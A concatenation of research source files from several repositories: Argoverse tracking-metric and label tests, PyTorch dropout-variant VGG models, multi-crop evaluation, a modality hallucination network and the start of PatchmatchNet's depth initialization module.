def test_1obj_offset_translation():
""" """
log_id = '1obj_offset_translation'
centers = []
# timestamp 0
cx = -4
cy = 3
cz = 0
centers += [(cx,cy,cz)]
# timestamp 1
cx = -2
cy = 3
cz = 0
centers += [(cx,cy,cz)]
# timestamp 2
cx = 0
cy = 3
cz = 0
centers += [(cx,cy,cz)]
# timestamp 3
cx = 2
cy = 3
cz = 0
centers += [(cx,cy,cz)]
yaw_angles = [0,0,0,0]
# dump the ground truth first
gt_centers, gt_yaw_angles = get_1obj_gt_scenario()
# dump the ground truth first
_ = dump_scenario_json(gt_centers, gt_yaw_angles, log_id, is_gt=True, run_eval=False)
result_dict = dump_scenario_json(centers, yaw_angles, log_id, is_gt=False)
assert result_dict['num_frames'] == 4
assert result_dict['mota'] == 100.0
assert np.allclose( result_dict['motp_c'], np.sqrt(2), atol=0.01) # (1,1) away each time
assert result_dict['motp_o'] == 0.0
assert result_dict['motp_i'] == 0.0
assert result_dict['idf1'] == 1.0
assert result_dict['most_track'] == 1.0
assert result_dict['most_lost'] == 0.0
assert result_dict['num_fp'] == 0
assert result_dict['num_miss'] == 0
assert result_dict['num_sw'] == 0
assert result_dict['num_frag'] == 0
def test_1obj_poor_translation():
"""
Miss in 1st frame, TP in 2nd frame,
lost in 3rd frame, retrack as TP in 4th frame
Yields 1 fragmentation. Prec=0.5, recall=0.5, F1=0.5
mostly tracked if it is successfully tracked
for at least 80% of its life span
If a track is only recovered for less than 20% of its
total length, it is said to be mostly lost (ML)
"""
log_id = '1obj_poor_translation'
centers = []
# timestamp 0
cx = -5
cy = 4
cz = 0
centers += [(cx,cy,cz)]
# timestamp 1
cx = -2
cy = 3
cz = 0
centers += [(cx,cy,cz)]
# timestamp 2
cx = 1
cy = 4
cz = 0
centers += [(cx,cy,cz)]
# timestamp 3
cx = 4
cy = 3
cz = 0
centers += [(cx,cy,cz)]
yaw_angles = [0,0,0,0]
# dump the ground truth first
gt_centers, gt_yaw_angles = get_1obj_gt_scenario()
# dump the ground truth first
_ = dump_scenario_json(gt_centers, gt_yaw_angles, log_id, is_gt=True, run_eval=False)
result_dict = dump_scenario_json(centers, yaw_angles, log_id, is_gt=False)
assert result_dict['num_frames'] == 4
sw = 0
mota = 1 - ((2 + 2 + 0) / 4) # 1 - (FN+FP+SW)/#GT
assert mota == 0.0
assert result_dict['mota'] == 0.0
assert np.allclose( result_dict['motp_c'], np.sqrt(2), atol=0.01) # (1,1) away each time
assert result_dict['motp_o'] == 0.0
assert result_dict['motp_i'] == 0.0
prec = 0.5
recall = 0.5
f1 = 2 * prec * recall / (prec + recall)
assert f1 == 0.5
assert result_dict['idf1'] == 0.5
assert result_dict['most_track'] == 0.0
assert result_dict['most_lost'] == 0.0
assert result_dict['num_fp'] == 2
assert result_dict['num_miss'] == 2 # false-negatives
assert result_dict['num_sw'] == 0
assert result_dict['num_frag'] == 1
def test_1obj_poor_orientation():
""" """
log_id = '1obj_poor_orientation'
centers = []
# timestamp 0
cx = -3
cy = 2
cz = 0
centers += [(cx,cy,cz)]
# timestamp 1
cx = -1
cy = 2
cz = 0
centers += [(cx,cy,cz)]
# timestamp 2
cx = 1
cy = 2
cz = 0
centers += [(cx,cy,cz)]
# timestamp 3
cx = 3
cy = 2
cz = 0
centers += [(cx,cy,cz)]
yaw_angles = [0.25,-0.25,0.25,-0.25]
# dump the ground truth first
gt_centers, gt_yaw_angles = get_1obj_gt_scenario()
# dump the ground truth first
_ = dump_scenario_json(gt_centers, gt_yaw_angles, log_id, is_gt=True, run_eval=False)
pdb.set_trace()
result_dict = dump_scenario_json(centers, yaw_angles, log_id, is_gt=False)
assert result_dict['num_frames'] == 4
assert result_dict['mota'] == 100.0
assert result_dict['motp_c'] == 0
assert result_dict['motp_o'] == 0.0 # ?????
assert result_dict['motp_i'] == 0.0
assert result_dict['idf1'] == 1.0
assert result_dict['most_track'] == 1.0
assert result_dict['most_lost'] == 0.0
assert result_dict['num_fp'] == 0
assert result_dict['num_miss'] == 0
assert result_dict['num_sw'] == 0
assert result_dict['num_frag'] == 0
"""
Additional examples are here: https://arxiv.org/pdf/1603.00831.pdf
"""
def get_orientation_error_deg(yaw1: float, yaw2: float):
"""
smallest difference between 2 angles
https://stackoverflow.com/questions/1878907/the-smallest-difference-between-2-angles
Args:
- yaw1: angle around unit circle, in radians in [-pi,pi]
- yaw2: angle around unit circle, in radians in [-pi,pi]
Returns:
- error: smallest difference between 2 angles, in degrees
"""
assert -np.pi < yaw1 and yaw1 < np.pi
assert -np.pi < yaw2 and yaw2 < np.pi
error = np.rad2deg(yaw1 - yaw2)
if error > 180:
error -= 360
if error < -180:
error += 360
return np.abs(error)
def test_orientation_error1():
""" """
yaw1 = np.deg2rad(179)
yaw2 = np.deg2rad(-179)
error_deg = get_orientation_error_deg(yaw1, yaw2)
assert np.allclose(error_deg, 2.0, atol=1e-2)
def test_orientation_error2():
""" """
yaw1 = np.deg2rad(-179)
yaw2 = np.deg2rad(179)
error_deg = get_orientation_error_deg(yaw1, yaw2)
print(error_deg)
assert np.allclose(error_deg, 2.0, atol=1e-2)
def test_orientation_error3():
""" """
yaw1 = np.deg2rad(179)
yaw2 = np.deg2rad(178)
error_deg = get_orientation_error_deg(yaw1, yaw2)
assert np.allclose(error_deg, 1.0, atol=1e-2)
def test_orientation_error4():
""" """
yaw1 = np.deg2rad(178)
yaw2 = np.deg2rad(179)
error_deg = get_orientation_error_deg(yaw1, yaw2)
assert np.allclose(error_deg, 1.0, atol=1e-2)
def test_orientation_error5():
""" """
yaw1 = np.deg2rad(3)
yaw2 = np.deg2rad(-3)
error_deg = get_orientation_error_deg(yaw1, yaw2)
assert np.allclose(error_deg, 6.0, atol=1e-2)
def test_orientation_error6():
""" """
yaw1 = np.deg2rad(-3)
yaw2 = np.deg2rad(3)
error_deg = get_orientation_error_deg(yaw1, yaw2)
assert np.allclose(error_deg, 6.0, atol=1e-2)
def test_orientation_error7():
""" """
yaw1 = np.deg2rad(-177)
yaw2 = np.deg2rad(-179)
error_deg = get_orientation_error_deg(yaw1, yaw2)
assert np.allclose(error_deg, 2.0, atol=1e-2)
def test_orientation_error8():
""" """
yaw1 = np.deg2rad(-179)
yaw2 = np.deg2rad(-177)
error_deg = get_orientation_error_deg(yaw1, yaw2)
assert np.allclose(error_deg, 2.0, atol=1e-2)
if __name__ == '__main__':
""" """
# test_1obj_perfect()
# test_1obj_offset_translation()
# test_1obj_poor_translation()
# test_1obj_poor_orientation()
test_orientation_error1()
test_orientation_error2()
test_orientation_error3()
test_orientation_error4()
test_orientation_error5()
test_orientation_error6()
test_orientation_error7()
test_orientation_error8()
```
#### File: argoverse-api/tests/test_frame_label_accumulator.py
```python
import glob
import pathlib
import tempfile
import numpy as np
import pytest
from argoverse.data_loading.frame_label_accumulator import PerFrameLabelAccumulator
TEST_DATA_LOC = pathlib.Path(__file__).parent.parent / "tests" / "test_data" / "tracking"
@pytest.fixture
def frame_acc() -> PerFrameLabelAccumulator:
pfa = PerFrameLabelAccumulator(TEST_DATA_LOC, TEST_DATA_LOC, "test", save=False)
pfa.accumulate_per_log_data()
pfa.accumulate_per_log_data(log_id="1")
return pfa
def test_traj_label_place_in_city(frame_acc: PerFrameLabelAccumulator) -> None:
traj_list = frame_acc.get_log_trajectory_labels("1")
city_frame_1_gt = [[[ 2., -1., -1.],
[ 2., -3., -1.],
[ 4., -1., -1.],
[ 4., -3., -1.]],
[[ 3., 1., 1.],
[ 3., 3., 1.],
[ 5., 1., 1.],
[ 5., 3., 1.]],
[[ 1., 4., 1.],
[ 1., 2., 1.],
[-1., 4., 1.],
[-1., 2., 1.]]]
city_frame_0_gt = [[[ 2., 1., 1.],
[ 2., -1., 1.],
[ 0., 1., 1.],
[ 0., -1., 1.]],
[[ 1., 1., -1.],
[ 1., -1., -1.],
[ 3., 1., -1.],
[ 3., -1., -1.]],
[[ 1., 0., 1.],
[ 1., 2., 1.],
[ 3., 0., 1.],
[ 3., 2., 1.]]]
for traj in traj_list:
assert traj.obj_class_str == 'VEHICLE'
city_frame = frame_acc.place_trajectory_in_city_frame(traj,"1")
if traj.track_uuid == "00000000-0000-0000-0000-000000000000":
assert np.array_equal(city_frame_0_gt,city_frame)
elif traj.track_uuid == "00000000-0000-0000-0000-000000000001":
assert np.array_equal(city_frame_1_gt,city_frame)
``` |
{
"source": "johnwlambert/dlupi-heteroscedastic-dropou",
"score": 2
} |
#### File: cnns/base_networks/random_gauss_dropout_vgg.py
```python
import torch.nn as nn
import torch.utils.model_zoo as model_zoo
import math
import torch
from torch.autograd import Variable
__all__ = [
'VGG', 'vgg11', 'vgg11_bn', 'vgg13', 'vgg13_bn', 'vgg16', 'vgg16_bn',
'vgg19_bn', 'vgg19',
]
class VGG_RandomGaussianDropout(nn.Module):
def __init__(self, features):
super(VGG_RandomGaussianDropout, self).__init__()
num_classes = 1000
self.features = features
self.relu = nn.ReLU(True)
self.fc1 = nn.Linear(512 * 7 * 7, 4096)
self.fc2 = nn.Linear(4096, 4096)
self.fc3 = nn.Linear(4096, num_classes)
self._initialize_weights()
def rand_gauss_dropout(self, x):
std = 1.0
mu = 1.0
eps = torch.cuda.FloatTensor( x.size() ).normal_()
eps = Variable( eps, volatile=False ) # we will need the Gradient
noise = eps.mul(std).add_(mu)
return x.mul(noise)
def forward(self, x, train):
x = self.features(x)
x = x.view(x.size(0), -1)
x = self.fc1(x)
x = self.relu(x)
if train:
x = self.rand_gauss_dropout(x)
x = self.fc2(x)
x = self.relu(x)
if train:
x = self.rand_gauss_dropout(x)
x = self.fc3(x)
return x
def _initialize_weights(self):
for m in self.modules():
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
if m.bias is not None:
m.bias.data.zero_()
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
elif isinstance(m, nn.Linear):
m.weight.data.normal_(0, 0.01)
m.bias.data.zero_()
def make_layers(cfg, batch_norm=False):
layers = []
in_channels = 3
for v in cfg:
if v == 'M':
layers += [nn.MaxPool2d(kernel_size=2, stride=2)]
else:
conv2d = nn.Conv2d(in_channels, v, kernel_size=3, padding=1)
if batch_norm:
layers += [conv2d, nn.BatchNorm2d(v), nn.ReLU(inplace=True)]
else:
layers += [conv2d, nn.ReLU(inplace=True)]
in_channels = v
return nn.Sequential(*layers)
cfg = {
'A': [64, 'M', 128, 'M', 256, 256, 'M', 512, 512, 'M', 512, 512, 'M'],
'B': [64, 64, 'M', 128, 128, 'M', 256, 256, 'M', 512, 512, 'M', 512, 512, 'M'],
'D': [64, 64, 'M', 128, 128, 'M', 256, 256, 256, 'M', 512, 512, 512, 'M', 512, 512, 512, 'M'],
'E': [64, 64, 'M', 128, 128, 'M', 256, 256, 256, 256, 'M', 512, 512, 512, 512, 'M', 512, 512, 512, 512, 'M'],
}
def vgg16_bn_random_gaussian_dropout():
"""VGG 16-layer model (configuration "D") with batch normalization
Args:
pretrained (bool): If True, returns a model pre-trained on ImageNet
"""
return VGG_RandomGaussianDropout(make_layers(cfg['D'], batch_norm=True) )
```
#### File: cnns/evaluation/multi_crop_eval.py
```python
import torch
import numpy as np
import math
import pdb
from torch.autograd import Variable
import sys
sys.path.append('../..')
from cnns.train.feedforward_routines import feedforward_routine
class MultiCropEvaluator(object):
def __init__(self, opt, model, dataset):
self.opt = opt
self.model = model
self.dataset = dataset
self.nCrops = opt.num_crops
self.num_test_examples = len(self.dataset)
print('There are ', self.num_test_examples, ' num test examples.')
self.softmax_op = torch.nn.Softmax()
self.test_set_counter = 0
# round up the number of batches
self.num_batches = int(math.ceil( self.num_test_examples * 1.0 / self.opt.batch_size ) )
def run_batched_eval_epoch(self):
"""
Compute multi-crop top-1 and top-5 error on batches (e.g. 130 images) from a hold-out set.
First accumulate a batch, then complete a feedforward pass on the batch images.
We employ an ensemble of experts to vote on each image by summing the softmax scores
over the multiple crops.
"""
np.random.seed(1)
torch.manual_seed(1)
torch.cuda.manual_seed(1)
top1Sum, top5Sum = 0.0, 0.0
self.model.eval()
print ('num_batches = ', self.num_batches)
for batch_idx in range(self.num_batches):
if (batch_idx % 20) == 0:
sys.stdout.flush()
batch_images_t, batch_labels = self._accumulate_single_batch_data()
if len(batch_labels) == 0:
break
batch_labels_t = torch.LongTensor(batch_labels)
# convert to CUDA float variables
batch_images_v = Variable( batch_images_t.type(torch.cuda.FloatTensor), volatile=True)
train = False
batch_masks_t = None
x_output_v = feedforward_routine(self.model, batch_images_v, batch_masks_t, train, self.opt)
# 10 crops count as 1 example
num_examples_processed = x_output_v.size(0) / self.opt.num_crops
softmax_output = self.softmax_op(x_output_v)
top1, top5 = self._batch_compute_score(softmax_output, batch_labels_t )
top1Sum = top1Sum + top1*num_examples_processed
top5Sum = top5Sum + top5*num_examples_processed
if ((batch_idx % self.opt.print_every) == 0) or (batch_idx == self.num_batches -2):
print((' | Test: {}/{} top1 {:.4f} top5 {:.4f}').format(
batch_idx, self.num_batches, top1Sum * 1. / self.test_set_counter, top5Sum * 1. / self.test_set_counter ))
batch_top1_acc_frac = top1Sum * 1. / self.num_test_examples
batch_top5_acc_frac = top5Sum * 1. / self.num_test_examples
print( (' * Finished eval top1: {:.4f} top5: {:.4f}\n').format( batch_top1_acc_frac, batch_top5_acc_frac ) )
return batch_top1_acc_frac, batch_top5_acc_frac
def _accumulate_single_batch_data(self):
""" Accumulate a batch of images and their corresponding labels. """
batch_images_t = None
batch_labels = []
for _ in range(self.opt.batch_size):
multicrop_data = self._get_multicrop_data_for_single_idx(self.test_set_counter)
images_t, label = multicrop_data
batch_labels += [label]
if batch_images_t is None:
# starting to accumulate for new batch
batch_images_t = images_t
else:
# append to existing batch data that is being accumulated
batch_images_t = torch.cat((batch_images_t, images_t), 0)
self.test_set_counter += 1 # always increment, so if 0,1,2,3,4, we know that there were 5 images in the end.
if self.test_set_counter >= self.num_test_examples:
break
return batch_images_t, batch_labels
def _get_multicrop_data_for_single_idx(self, idx):
"""
Repeatedly call __getitem__(index) on the ImageFolder class instance ("dataset").
Each time, we obtain a randomly transformed version of the image, indexed via "idx"
from the dataset.
"""
ims = []
example_target = None
for crop_idx in range(self.opt.num_crops):
im, target = self.dataset[idx] # don't need masks at test time
ims += [im]
if example_target is None:
example_target = target
assert target == example_target
batch_ims = torch.stack(ims, 0)
return (batch_ims, example_target)
def _batch_compute_score(self, output, target):
"""
Compute top-1, top-5 accuracy in Torch
10-crop validation error on ImageNet (averaging softmax scores of 10 224x224 crops from resized image with shorter side=256).
The effective batch size is equal to the number of independent examples, because 10 crops of an image
are collapsed into a single prediction.
"""
num_independent_examples = output.size(0) / self.nCrops # independent means not a different crop of the same image
num_classes = output.size(1)
if self.nCrops > 1:# Sum over crops
output = output.view( num_independent_examples, self.nCrops, num_classes )
# sum over the 10-crop dimension, combining softmax scores over all crops of same image
output = output.data.cpu().sum(1)
else:
print 'Should have been multi crop. Quitting...'
quit()
# Returns the k largest elements of the given input Tensor along a given dimension.
_ , top5_preds = output.float().topk(k=5, dim=1, largest=True, sorted=True) # in descending order
# Find which predictions match the target
correct = top5_preds.eq( target.unsqueeze(1).expand_as(top5_preds) )
# correct has dim (num_independent_examples, 5)
# Top-1 acc score
top1 = correct.narrow(dimension=1, start=0, length=1).sum() # take first column
top1 = top1 * 1.0 / num_independent_examples # as percentage in [0,1]
# Top-5 score, if there are at least 5 classes
top5 = correct.sum()
top5 = top5 * 1.0 / num_independent_examples
return top1, top5
```
#### File: cnns/models/information_dropout.py
```python
from __future__ import absolute_import, division, print_function, unicode_literals
import torch
import torch.nn as nn
import math
from torch.autograd import Variable
import collections
from cnns.nn_utils.reparameterization_trick import sample_lognormal
import sys
sys.path.append('..')
import os
import numpy as np
import pdb
# Gaussian Dropout as a function of x
class VGG_InformationDropout(nn.Module):
def __init__(self, opt):
super(VGG_InformationDropout, self).__init__()
self.opt = opt
self.FC_size = self.opt.fc_size
self.lognorm_prior = False
self.max_alpha = 0.7
self.activation_fn = 'relu' # 'sigmoid' # not 'softplus'
# CONV LAYERS DO NOT REQUIRE DROPOUT
self.cfg = [64, 64, 'M',
128, 128, 'M',
256, 256, 256, 'M',
512, 512, 512, 'M',
512, 512, 512, 'M']
self.features = self.make_layers()
# If learning these params fails, can also try:
# mu1 = 0.8 * torch.ones(alphas[0].size()).type(torch.cuda.FloatTensor)
# sigm1 = 0.8
# mu1 = 0.5
# sigma1 = 0.4
self.mu1 = nn.Parameter(torch.rand(1)) # learned scalar, requires grad by default
self.sigma1 = nn.Parameter(torch.rand(1)) # learned scalar, requires grad by default
out_recept_fld_sz = opt.image_size / (2 ** 5 ) # 5 max pools that shrink size
assert out_recept_fld_sz == 7
assert self.FC_size == 4096
flattened_feat_sz = 512 * out_recept_fld_sz * out_recept_fld_sz
flattened_feat_sz = int(flattened_feat_sz) # Int must be Tensor Size input
# Using self.opt.activation_fn == 'relu'
# Could also use self.opt.activation_fn == 'softplus' ; x = self.softplus(x)
self.x_fc1 = nn.Sequential(nn.Linear(flattened_feat_sz, self.FC_size), nn.Sigmoid() )
self.fc1_alpha = nn.Sequential(nn.Linear(flattened_feat_sz, self.FC_size), nn.Sigmoid() )
# Squash input here to prevent unbounded noise... (Sigmoid instead of nn.ReLU(True) )
self.x_fc2 = nn.Sequential(nn.Linear(self.FC_size, self.FC_size), nn.Sigmoid() )
self.fc2_alpha = nn.Sequential(nn.Linear(self.FC_size, self.FC_size), nn.Sigmoid() )
assert self.opt.num_classes == 1000
self.x_fc3 = nn.Linear(self.FC_size, self.opt.num_classes)
self._initialize_weights()
def make_layers(self, batch_norm=True):
layers = []
in_channels = 3
for v in self.cfg:
if v == 'M':
layers += [nn.MaxPool2d(kernel_size=2, stride=2)]
else:
conv2d = nn.Conv2d(in_channels, v, kernel_size=3, padding=1)
if batch_norm:
if self.activation_fn == 'relu':
layers += [conv2d, nn.BatchNorm2d(v), nn.ReLU(inplace=True)]
elif self.activation_fn == 'softplus':
layers += [conv2d, nn.BatchNorm2d(v), nn.Softplus()]
elif self.activation_fn == 'sigmoid':
layers += [conv2d, nn.Sigmoid() ]
else:
if self.activation_fn == 'relu':
layers += [conv2d, nn.ReLU(inplace=True)]
elif self.activation_fn == 'softplus':
layers += [conv2d, nn.Softplus()]
elif self.activation_fn == 'sigmoid':
layers += [conv2d, nn.Sigmoid() ]
in_channels = v
return nn.Sequential(*layers)
def _initialize_weights(self):
for m in self.modules():
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
if m.bias is not None:
m.bias.data.zero_()
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
elif isinstance(m, nn.Linear):
m.weight.data.normal_(0, 0.01)
m.bias.data.zero_()
def _KL_div2(self, mu, sigma, mu1, sigma1):
'''KL divergence between N(mu,sigma**2) and N(mu1,sigma1**2)'''
return 0.5 * ((sigma / self.sigma1) ** 2 + (mu - self.mu1) ** 2 / self.sigma1 ** 2 - 1 + 2 * (torch.log(self.sigma1) - torch.log(sigma)))
def _information_dropout(self, x_out, alpha, sigma0=1. ):
""" We already computes the noise parameter alpha from its own FC layer based on the input"""
# Rescale alpha in the allowed range and add a small value for numerical stability
alpha = 0.001 + self.max_alpha * alpha
# Similarly to variational dropout we renormalize so that
# the KL term is zero for alpha == self.max_alpha
if not self.lognorm_prior:
kl = -1. * torch.log(alpha / (self.max_alpha + 0.001))
else:
# info dropout for softplus
kl = self._KL_div2(torch.log(torch.max(x_out,1e-4)), alpha)
zero_mean = Variable( torch.zeros(x_out.size()).type(torch.cuda.FloatTensor) )
noise = sample_lognormal(mean=zero_mean, sigma=alpha, sigma0=sigma0)
# Noisy output of Information Dropout
return x_out * noise, kl
def forward(self, x, train):
if train:
self.sigma0 = 1.
else:
self.sigma0 = 0 # will turn noise into exp(0), which =1
x = self.features(x)
x = x.view(x.size(0), -1)
x_cloned = x.clone()
x = self.x_fc1(x) # compute the noiseless output, includes relu
alpha = self.fc1_alpha(x_cloned)
if train:
x, kl_term1 = self._information_dropout(x, alpha)
x_cloned = x.clone()
x = self.x_fc2(x) # compute the noiseless output, includes relu
alpha = self.fc2_alpha(x_cloned)
if train:
x, kl_term2 = self._information_dropout(x, alpha)
x = self.x_fc3(x)
if train:
kl_terms = []
kl_terms.append(kl_term1)
kl_terms.append(kl_term2)
else:
kl_terms = None
return x, kl_terms
class AllCNN224_InfoDropout(nn.Module):
def __init__(self):
super(AllCNN224_InfoDropout, self).__init__(self)
# Striving for Simplicity: The All Convolutional Net [Springenberg et al., 2015]
# Architecture of the ImageNet network.
# input Input 224 x 224 RGB image
self.conv123 = self._build_conv_block(kernel_sz_cfg = [11,1,3],
stride_cfg = [4,1,2],
depth_cfg=[96,96,96],
in_channels = 3)
self.conv456 = self._build_conv_block(kernel_sz_cfg = [5,1,3],
stride_cfg = [1,1,2],
depth_cfg=[256,256,256],
in_channels = 96)
self.conv789 = self._build_conv_block(kernel_sz_cfg = [3,1,3],
stride_cfg = [1,1,2],
depth_cfg=[384,384,384],
in_channels=256)
# dropout 50
self.conv10_11_12 = self._build_conv_block(kernel_sz_cfg = [3,1,1],
stride_cfg = [1,1,1],
depth_cfg=[1024,1024,1000],
in_channels=384)
# global pool global average pooling (6 x 6)
self.avgpool = nn.AvgPool2d(6)
# softmax 1000-way softmax
self.fc = nn.Linear(self.FC_size, self.opt.num_classes)
def _build_conv_block(self, kernel_sz_cfg, stride_cfg, depth_cfg, in_channels, batch_norm=True):
layers = []
for cfg_idx, depth in depth_cfg:
conv2d = nn.Conv2d(in_channels,
depth,
kernel_size=kernel_sz_cfg[cfg_idx],
stride=stride_cfg[cfg_idx])
if batch_norm:
if self.activation_fn == 'relu':
layers += [conv2d, nn.BatchNorm2d(depth), nn.ReLU(inplace=True)]
elif self.activation_fn == 'softplus':
layers += [conv2d, nn.BatchNorm2d(depth), nn.Softplus()]
else:
if self.activation_fn == 'relu':
layers += [conv2d, nn.ReLU(inplace=True)]
elif self.activation_fn == 'softplus':
layers += [conv2d, nn.Softplus()]
in_channels = depth
return nn.Sequential(*layers)
def forward(self, x):
x = self.conv123(x)
# info dropout
x = self.conv456(x)
# info dropout
x = self.conv789(x)
# info dropout
# dropout 50
x = self.conv10_11_12(x)
# info dropout
# global pool
x = self.avgpool(x)
# softmax 100
x = self.fc(x)
return x
class AllCNN96_InfoDropout(nn.Module):
def __init__(self):
super(AllCNN96_InfoDropout, self).__init__(self)
pass
# Input 96x96
# 3x3 conv 32 ReLU
# 3x3 conv 32 ReLU
# 3x3 conv 32 ReLU stride 2
# dropout
# 3x3 conv 64 ReLU
# 3x3 conv 64 ReLU
# 3x3 conv 64 ReLU stride 2
# dropout
# 3x3 conv 96 ReLU
# 3x3 conv 96 ReLU
# 3x3 conv 96 ReLU stride 2
# dropout
# 3x3 conv 192 ReLU
# 3x3 conv 192 ReLU
# 3x3 conv 192 ReLU stride 2
# dropout
# 3x3 conv 192 ReLU
# 1x1 conv 192 ReLU
# 1x1 conv 10 ReLU
# spatial average
# softmax
def forward(self):
pass
```
#### File: cnns/models/modality_hallucination_model.py
```python
from __future__ import absolute_import, division, print_function, unicode_literals
import torch
import torch.nn as nn
import math
from torch.autograd import Variable
import pdb
import sys
sys.path.append('..')
from cnns.nn_utils.autograd_clamp_grad_to_zero import clamp_grad_to_zero
from cnns.base_networks.vgg_truncated import VGGTruncatedConv, VGGTruncatedClassifier
class VGGNetModified(nn.Module):
def __init__(self,opt,freeze_at_layer_l ):
super(VGGNetModified, self).__init__()
self.opt = opt
self.freeze_at_layer_l = freeze_at_layer_l
self.conv = VGGTruncatedConv(opt)
self.classifier = VGGTruncatedClassifier(opt)
def forward(self, x):
"""
INPUTS:
- x: (N x C x H x W), (64 x 3 x 224 x 224)
We set the learning rates of all layers lower than the hallucination
loss in the depth network to zero.This effectively freezes the depth extractor
up to and including layer so that the target depth activations are not modified
through backpropagation of the hallucination loss.
OUTPUTS:
- midlevel_act: dimensions are (N x 512 x 7 x 7)
- x: these are the logits. dimensions are ( N x 100 )
"""
x = self.conv(x)
midlevel_act = x.clone() # we are extracting activations at pool5
if self.freeze_at_layer_l:
x = clamp_grad_to_zero()(x)
x = self.classifier(x)
return midlevel_act, x
class ModalityHallucinationModel(nn.Module):
def __init__(self,opt):
"""
The hallucination network has parameters independent of both the RGB and
depth networks as we want the hallucination network activations
to match the corresponding depth mid-level activations,
however we do not want the feature extraction to be
identical to the depth network as the inputs are RGB images
for the hallucination network and depth images for the
depth network.
Independently finetune the depth network after initializing with the RGB weights
"""
super(ModalityHallucinationModel, self).__init__()
self.opt = opt
if self.opt.train_depth_only:
self.depth_net = VGGNetModified(opt, freeze_at_layer_l=False)
else:
self.hallucination_net = VGGNetModified(opt, freeze_at_layer_l=False)
self.rgb_net = VGGNetModified(opt, freeze_at_layer_l=False )
self.depth_net = VGGNetModified(opt, freeze_at_layer_l=True )
self.sigmoid = nn.Sigmoid()
def forward(self, RGB_ims, xstar, train):
"""
RGB_ims: (N x C x H x W), (64 x 3 x 224 x 224)
xstar: (N x C x H x W), (64 x 3 x 224 x 224)
"""
if train:
depth_midlevel_act, depth_logits = self.depth_net(xstar)
if self.opt.train_depth_only:
cache = (depth_logits)
return cache
else:
# train all 3 networks
halluc_midlevel_act, halluc_logits = self.hallucination_net(RGB_ims)
_, rgb_logits = self.rgb_net(RGB_ims)
# one additional hallucination loss which matches midlevel
# activations from the hallucination branch to those from the depth branch
# squared l-2 norm. torch.norm( - ) ** 2 is not differentiable in PyTorch
# we can make backprop differentiable at 0. by using torch.pow(-, 2)
hallucination_loss = self.sigmoid(halluc_midlevel_act) - self.sigmoid(depth_midlevel_act)
hallucination_loss = torch.pow( hallucination_loss, 2)
# "Euclidean norm" is generalized Frobenius norm for a tensor?
hallucination_loss = hallucination_loss.sum()
cache = (halluc_midlevel_act, halluc_logits, rgb_logits, depth_midlevel_act, depth_logits, hallucination_loss)
return cache
else:
# Final model which at test time only sees an RGB image, but
# is able to extract both the image features learned through
# finetuning with standard supervised losses as well as the
# hallucinated features which have been trained to mirror those
# features you would extract if a depth image were present.
if self.opt.train_depth_only:
_, depth_logits = self.depth_net(xstar)
cache = (depth_logits)
else:
_, halluc_logits = self.hallucination_net(RGB_ims)
_, rgb_logits = self.rgb_net(RGB_ims)
cache = (halluc_logits, rgb_logits)
return cache
```
#### File: cnns/nn_utils/frobenius.py
```python
import torch
def frobenius_norm(x, take_sqrt_in_frobenius_norm ):
"""
INPUTS:
- tensor in Variable format, of shape NCHW? or ( N x num_fc_output_neurons )
OUTPUTS:
- scalar in Variable format
Take
[ batch_size, C, H, W]
to
"""
x = torch.pow(x,2)
x = torch.sum(x, 3)
x = torch.sum(x, 2)
x = torch.sum(x, 1)
x = x.squeeze()
# may need to sum if there is 4th dimension also
if take_sqrt_in_frobenius_norm:
x = torch.sqrt(x)
batch_sz = x.size(0)
x = torch.sum(x,0) / batch_sz # avg Frobenius norm loss per training example
return x
```
#### File: cnns/nn_utils/reparameterization_trick.py
```python
import torch
from torch.autograd import Variable
def vanilla_reparametrize( mu, std ):
"""
noise = x_output.new().resize_as_(x_output)
"""
#if self.opt.cuda:
# Assume we are in CUDA mode
eps = torch.cuda.FloatTensor(std.size()).normal_()
# else:
# eps = torch.FloatTensor(std.size()).normal_()
eps = Variable(eps)
return eps.mul(std).add_(mu), std
def vae_reparametrize( mu, logvar, distribution= 'normal' ):
std = logvar.mul(0.5).exp_()
# Assume if self.opt.cuda: is True
if distribution == 'normal':
eps = torch.cuda.FloatTensor(std.size()).normal_() # [torch.cuda.FloatTensor of size 1x1x4096 (GPU 0)]
else:
print 'undefined distribution for reparam trick. quitting...'
quit()
# else:
# eps = torch.FloatTensor(std.size()).normal_()
eps = Variable(eps)
return eps.mul(std).add_(mu), std
def sample_lognormal(mean, sigma, sigma0=1.):
"""
Samples from a log-normal distribution using the reparametrization
trick so that we can backprogpagate the gradients through the sampling.
By setting sigma0=0 we make the operation deterministic (useful at testing time)
.normal() gives mean=0, std=1.
"""
eps = Variable( mean.data.new(mean.size()).normal_().type(torch.cuda.FloatTensor) )
return torch.exp(mean + sigma * sigma0 * eps )
``` |
{
"source": "johnwlambert/PatchmatchNet",
"score": 3
} |
#### File: PatchmatchNet/models/patchmatch.py
```python
import torch
import torch.nn as nn
import torch.nn.functional as F
from .module import *
import cv2
import numpy as np
class DepthInitialization(nn.Module):
def __init__(self, patchmatch_num_sample = 1):
super(DepthInitialization, self).__init__()
self.patchmatch_num_sample = patchmatch_num_sample
def forward(self, random_initialization, min_depth, max_depth, height, width, depth_interval_scale, device,
depth=None):
batch_size = min_depth.size()[0]
if random_initialization:
# first iteration of Patchmatch on stage 3, sample in the inverse depth range
# divide the range into several intervals and sample in each of them
inverse_min_depth = 1.0 / min_depth
inverse_max_depth = 1.0 / max_depth
patchmatch_num_sample = 48
# [B,Ndepth,H,W]
depth_sample = torch.rand((batch_size, patchmatch_num_sample, height, width), device=device) + \
torch.arange(0, patchmatch_num_sample, 1, device=device).view(1, patchmatch_num_sample, 1, 1)
depth_sample = inverse_max_depth.view(batch_size,1,1,1) + depth_sample / patchmatch_num_sample * \
(inverse_min_depth.view(batch_size,1,1,1) - inverse_max_depth.view(batch_size,1,1,1))
depth_sample = 1.0 / depth_sample
return depth_sample
else:
# other Patchmatch, local perturbation is performed based on previous result
# uniform samples in an inversed depth range
if self.patchmatch_num_sample == 1:
return depth.detach()
else:
inverse_min_depth = 1.0 / min_depth
inverse_max_depth = 1.0 / max_depth
